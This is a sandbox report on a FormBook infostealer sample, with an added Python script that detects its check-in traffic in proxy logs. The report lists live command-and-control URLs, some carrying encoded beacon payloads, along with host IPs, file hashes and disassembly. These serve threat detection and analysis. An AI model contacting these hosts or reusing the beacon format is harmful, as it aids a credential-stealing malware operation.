                                          www.antonio-vivaldi.mobi
                                          unknown
                                          unknownfalse
                                            high
Name | Malicious | Antivirus Detection | Reputation
http://www.empowermedeco.com/fo8o/ | false | - | high
http://www.goldenjade-travel.com/fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd | true | Avira URL Cloud: malware | unknown
http://www.rssnewscast.com/fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd | true | Avira URL Cloud: malware | unknown
http://www.elettrosistemista.zip/fo8o/ | true | Avira URL Cloud: malware | unknown
http://www.magmadokum.com/fo8o/ | false | - | high
http://www.rssnewscast.com/fo8o/ | false | - | high
http://www.3xfootball.com/fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWd | true | Avira URL Cloud: safe | unknown
http://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd | true | Avira URL Cloud: safe | unknown
http://www.elettrosistemista.zip/fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWd | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/ | false | - | high
http://www.techchains.info/fo8o/ | false | - | high
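Every URL in the table above shares one shape: a fixed path (/fo8o/) and, for the actual check-ins, a fixed pair of query parameters (7BpTBrLp carrying a base64 payload, 3vjHf carrying a short tail) spread across several hosts that the sandbox still rates "high" reputation. FormBook builds randomise the path and parameter names per build and typically ship several decoy hosts next to the real C2, so a detection keyed on the request shape catches this build on any of its hosts, while a host blocklist alone does not. The following Python is an added example, not part of the Joe Sandbox report: the path, parameter names and URLs are copied from the tables above, the proxy log lines are constructed, and the function names are my own.

```python
"""Turn the check-in URLs listed in this report into a matcher for proxy logs.
Added example; indicator values are copied from the report, everything else
(function names, log lines) is constructed."""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import urlsplit

# Indicators read off the report's URL table.  FormBook randomises the
# check-in path and parameter names per build, so these identify this build only.
C2_PATH = "/fo8o/"
BEACON_PARAM, TAIL_PARAM = "7BpTBrLp", "3vjHf"

# URLs copied from the report, plus two benign ones from the "URLs from
# memory" table as negative controls.
SAMPLE_URLS = [
    "http://www.goldenjade-travel.com/fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd",
    "http://www.rssnewscast.com/fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd",
    "http://www.3xfootball.com/fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWd",
    "http://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd",
    "http://www.elettrosistemista.zip/fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWd",
    "http://www.empowermedeco.com/fo8o/",
    "http://www.magmadokum.com/fo8o/",
    "http://www.techchains.info/fo8o/",
    "https://duckduckgo.com/ac/?q=",
    "https://www.sedo.com/services/parking.php3",
]

# Constructed Squid-style proxy lines (not from the report) for scan_log().
SAMPLE_LOG = [
    "1732554727.101 312 10.0.0.12 TCP_MISS/200 512 GET " + SAMPLE_URLS[0]
    + " - HIER_DIRECT/116.50.37.244 text/html",
    "1732554728.455 58 10.0.0.12 TCP_MISS/200 2048 GET https://duckduckgo.com/ac/?q= - HIER_DIRECT/- application/json",
    "1732554730.002 300 10.0.0.12 TCP_MISS/404 0 GET http://www.techchains.info/fo8o/ - HIER_DIRECT/66.29.149.46 text/html",
]


def split_query(query: str) -> dict:
    """Split a query string by hand: urllib.parse.parse_qs would turn the '+'
    characters of the base64 payload into spaces and break the decode check."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def looks_base64(value: str) -> bool:
    """True if value is well-formed standard base64 with correct length/padding."""
    if not value or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def classify(url: str) -> Optional[dict]:
    """None for URLs outside this build's check-in path; otherwise the host,
    whether the request is a full beacon (both parameters present and the
    payload base64-shaped) and the decoded payload length in bytes."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.path != C2_PATH:
        return None
    params = split_query(parts.query)
    payload = params.get(BEACON_PARAM, "")
    beacon = TAIL_PARAM in params and looks_base64(payload)
    return {
        "host": parts.hostname,
        "beacon": beacon,
        "payload_bytes": len(base64.b64decode(payload)) if beacon else 0,
    }


def summarize(urls) -> dict:
    """Hosts seen on the check-in path, split into full beacons and bare path hits."""
    hits = [r for r in map(classify, urls) if r]
    return {
        "hosts": sorted({r["host"] for r in hits}),
        "beacons": sum(r["beacon"] for r in hits),
        "path_only": sum(not r["beacon"] for r in hits),
    }


URL_RE = re.compile(r"https?://[^\s\"']+")


def scan_log(lines) -> list:
    """(line number, host) for every log line that carries a full beacon.
    Works on any text log that embeds the complete request URL."""
    found = []
    for n, line in enumerate(lines, 1):
        for url in URL_RE.findall(line):
            r = classify(url)
            if r and r["beacon"]:
                found.append((n, r["host"]))
    return found


if __name__ == "__main__":
    print(summarize(SAMPLE_URLS))
    print(scan_log(SAMPLE_LOG))
```

Two details matter in practice: the query must be split without parse_qs, which would decode the `+` inside the base64 payload as a space and make the payload fail the base64 check; and the bare path hits (no query) are worth keeping as a weaker signal, since the sandbox saw both forms against the same hosts.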
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.empowermedeco.com | AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4137332421.0000000004A63000.00000040.80000000.00040000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000003.00000002.4136427268.0000000003EEE000.00000004.10000000.00040000.00000000.sdmp; netbtugc.exe, 00000003.00000002.4137916107.0000000005D90000.00000004.00000800.00020000.00000000.sdmp; AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.000000000318E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.sedo.com/services/parking.php3 | AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.000000000318E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000003.00000002.4136427268.0000000004212000.00000004.10000000.00040000.00000000.sdmp; AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000034B2000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000003.00000002.4136427268.0000000004212000.00000004.10000000.00040000.00000000.sdmp; AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000034B2000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR | netbtugc.exe, 00000003.00000002.4136427268.000000000485A000.00000004.10000000.00040000.00000000.sdmp; AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.0000000003AFA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1562576
                                                                                  Start date and time:2024-11-25 18:10:21 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 37s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Certificate 11-18720.exe
                                                                                  (renamed file extension from exe_ to exe)
                                                                                  Original Sample Name:Certificate 11-18720.exe_
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@14/7
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 75%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 98%
                                                                                  • Number of executed functions: 53
                                                                                  • Number of non-executed functions: 296
                                                                                  Cookbook Comments:
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target AQvzsYASIFuMivlIGfCCjBw.exe, PID 5956 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: Certificate 11-18720.exe
Time | Type | Description
12:12:07 | API Interceptor | 11344594x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.195.240.94 | Certificate 11-19AIS.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-21AIS.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 1045-20-11.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 719A1120-2024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 64411-18.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-17.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-142024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | rDocument11-142024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | glued.hta | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | rBALT-10212024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
154.215.72.110 | wOoESPII08.exe | malicious | FormBook | www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
154.215.72.110 | N2sgk6jMa2.exe | malicious | FormBook | www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
154.215.72.110 | Document 151-512024.exe | malicious | FormBook | www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
195.110.124.133 | Certificate 11-19AIS.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | www.officinadelpasso.shop/te2d/
195.110.124.133 | Certificate 11-21AIS.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Certificate 1045-20-11.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Certificate 719A1120-2024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Certificate 64411-18.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Certificate 11-142024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | rDocument11-142024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.nutrigenfit.online/2vhi/
195.110.124.133 | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | www.nutrigenfit.online/2vhi/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.3xfootball.com | Certificate 11-19AIS.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-21AIS.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 1045-20-11.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 719A1120-2024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 20156-2024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | RvJVMsNLJI.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 64411-18.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-17.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-142024.exe | malicious | FormBook | 154.215.72.110
www.goldenjade-travel.com | Certificate 11-19AIS.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-21AIS.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 1045-20-11.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 719A1120-2024.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | RvJVMsNLJI.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 64411-18.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-17.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-142024.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | rDocument11-142024.exe | malicious | FormBook | 116.50.37.244
Match | Associated Sample Name / URL | Detection | Threat Name | Context
POWERLINE-AS-APPOWERLINEDATACENTERHK | loligang.ppc.elf | malicious | Mirai | 154.195.240.49
POWERLINE-AS-APPOWERLINEDATACENTERHK | loligang.mips.elf | malicious | Mirai | 154.193.88.157
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-19AIS.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | ORIGINAL INVOICE COAU7230734290.exe | malicious | FormBook | 154.216.76.80
POWERLINE-AS-APPOWERLINEDATACENTERHK | Payroll List.exe | malicious | FormBook | 154.216.76.80
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-21AIS.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 1045-20-11.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 719A1120-2024.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | DOC_114542366.vbe | malicious | FormBook | 156.251.17.224
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 20156-2024.exe | malicious | FormBook | 154.215.72.110
REGISTER-ASIT | Certificate 11-19AIS.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | 195.110.124.133
REGISTER-ASIT | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 195.110.124.133
REGISTER-ASIT | SİPARİŞ No.112024-pdf.bat.exe | malicious | FormBook, GuLoader | 195.110.124.133
REGISTER-ASIT | Certificate 11-21AIS.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 1045-20-11.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 719A1120-2024.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | RvJVMsNLJI.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Certificate 64411-18.exe | malicious | FormBook | 195.110.124.133
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 11-19AIS.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 11-21AIS.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 1045-20-11.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 719A1120-2024.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | RvJVMsNLJI.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 64411-18.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 11-17.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | Certificate 11-142024.exe | malicious | FormBook | 116.50.37.244
DONGFONG-TWDongFongTechnologyCoLtdTW | rDocument11-142024.exe | malicious | FormBook | 116.50.37.244
SEDO-ASDE | Certificate 11-19AIS.exe | malicious | FormBook | 91.195.240.94
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):114688
                                                                                  Entropy (8bit):0.9746603542602881
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Process:C:\Users\user\Desktop\Certificate 11-18720.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):270848
                                                                                  Entropy (8bit):7.9943258967865996
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:pFFPnrcERM01mgVoiWWDNFv5j+ia45dJUaV2X2QZ:XFvwu5VJWWD5j0CrUc0Z
                                                                                  MD5:AD39C6BEF2EE20589F7A6D816524B642
                                                                                  SHA1:B90B7C5FF956BCF4B28EC799EBBC142F0B1B03E3
                                                                                  SHA-256:57B3EDF2C964E554A548518224BD8C51F51CF208351977602CE5A6E79A01B531
                                                                                  SHA-512:32F41606E357137CE8897A921ACEE0A365A0D2081B5F78926603C581C93D73C8653354AD5AFF41509AD2B0631863C636E058C8FC065F7CCC599098B516262441
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.128379503240229
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Certificate 11-18720.exe
                                                                                  File size:1'197'568 bytes
                                                                                  MD5:287e61624e5c839ff4b366e1969b3bce
                                                                                  SHA1:de64781dc1e8d8fa7c89c0e0e1952970efa6bafd
                                                                                  SHA256:88bd9c321e78561ad3a06e28f49adf5c09a2ad460c39c946ebffd3ec716276d3
                                                                                  SHA512:0a07311662b1b78e5030a1b3c6a5ea84ea4c5fdada5f954ecaa9d7183f3f3f103b3e4e9844344e4d87aaf24223dddb9ca9b11fa9f09178519eadaa0604007f49
                                                                                  SSDEEP:24576:gtb20pkaCqT5TBWgNQ7aVstv2/34RUf2aJabe8cXb6A:pVg5tQ7aVstv2/4RbI5
                                                                                  TLSH:3945C01263DE8361C7B25273BA267701BE7F782506B1F96B2FD4093DE920122525EB73
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                  Entrypoint:0x425f74
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x673BCB9B [Mon Nov 18 23:19:55 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                  Instruction
                                                                                  call 00007FC8B4BC2EAFh
                                                                                  jmp 00007FC8B4BB5EC4h
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FC8B4BB604Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007FC8B4BB63AEh
                                                                                  bt dword ptr [004C0158h], 01h
                                                                                  jnc 00007FC8B4BB6049h
                                                                                  rep movsb
                                                                                  jmp 00007FC8B4BB635Ch
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007FC8B4BB6214h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007FC8B4BB6050h
                                                                                  bt dword ptr [004BA370h], 01h
                                                                                  jc 00007FC8B4BB6520h
                                                                                  bt dword ptr [004C0158h], 00000000h
                                                                                  jnc 00007FC8B4BB61EDh
                                                                                  test edi, 00000003h
                                                                                  jne 00007FC8B4BB61FEh
                                                                                  test esi, 00000003h
                                                                                  jne 00007FC8B4BB61DDh
                                                                                  bt edi, 02h
                                                                                  jnc 00007FC8B4BB604Fh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007FC8B4BB6053h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007FC8B4BB60A5h
                                                                                  bt esi, 03h
                                                                                  jnc 00007FC8B4BB60F8h
                                                                                  movdqa xmm1, dqword ptr [esi+00h]
                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                                  • [RES] VS2012 UPD4 build 61030
                                                                                  • [LNK] VS2012 UPD4 build 61030
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb7004          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc4000          0x5b434       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x120000         0x6c4c        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x8d8d0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
